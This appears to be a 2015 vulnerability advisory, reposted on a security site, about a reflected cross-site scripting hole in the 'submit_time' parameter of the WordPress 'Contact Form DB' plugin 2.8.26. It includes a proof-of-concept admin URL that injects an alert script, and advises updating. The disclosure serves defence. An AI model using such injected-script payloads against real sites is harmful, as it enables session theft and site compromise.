WordPress Contact Form DB 2.8.26 Cross Site Scripting

2015.02.10
Credit: Morten
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Title: WordPress 'Contact Form DB' plugin - XSS Version: 2.8.26 Author: Morten N?rtoft, Kenneth Jepsen, Mikkel Vej Date: 2015/01/26 Download: https://wordpress.org/plugins/contact-form-7-to-database-extension/ Contacted WordPress: 2015/01/26 ========================================================== ## Description: ========================================================== Saves submitted form data to the database. Export the data to a file or use short codes to display it. ## Reflected XSS: ========================================================== The 'submit_time' parameter is not properly sanitized before being used. PoC: Log in as admin and visit the following url: http://[URL]/wp-admin/admin.php?page=CF7DBPluginSubmissions&submit_time=%22/%3E%3Cscript%3Ealert%28101%29%3C/script%3E ## Solution ========================================================== Update to newest version.

References:

https://wordpress.org/plugins/contact-form-7-to-database-extension/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top